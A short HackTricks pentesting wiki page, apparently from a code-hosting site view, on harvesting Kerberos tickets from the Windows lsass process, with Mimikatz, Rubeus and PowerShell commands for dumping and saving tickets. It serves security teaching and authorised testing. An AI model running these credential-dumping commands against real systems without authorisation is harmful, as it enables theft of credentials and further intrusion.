hacktricks/pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md

12 lines
980 B
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Harvesting tickets from Windows
In Windows, tickets are **handled and stored by the lsass** (Local Security Authority Subsystem Service) process, which is responsible for security. Hence, to retrieve tickets from a Windows system, it is necessary to **communicate with lsass and ask for them**. As a **non-administrative user only owned tickets can be fetched**, however, as machine **administrator**, **all **of them can be harvested. For this purpose, the tools **Mimikatz or Rubeus** can be used as shown below:
```
mimikatz # sekurlsa::tickets /export
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
```
**This information was taken from:** [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)****[\
](https://app.gitbook.com/@cpol/s/hacktricks/\~/drafts/-LhAFG7vZpkSqhe9Wmev/primary/todo/pentesting-kerberos-88/harvesting-tickets-from-windows)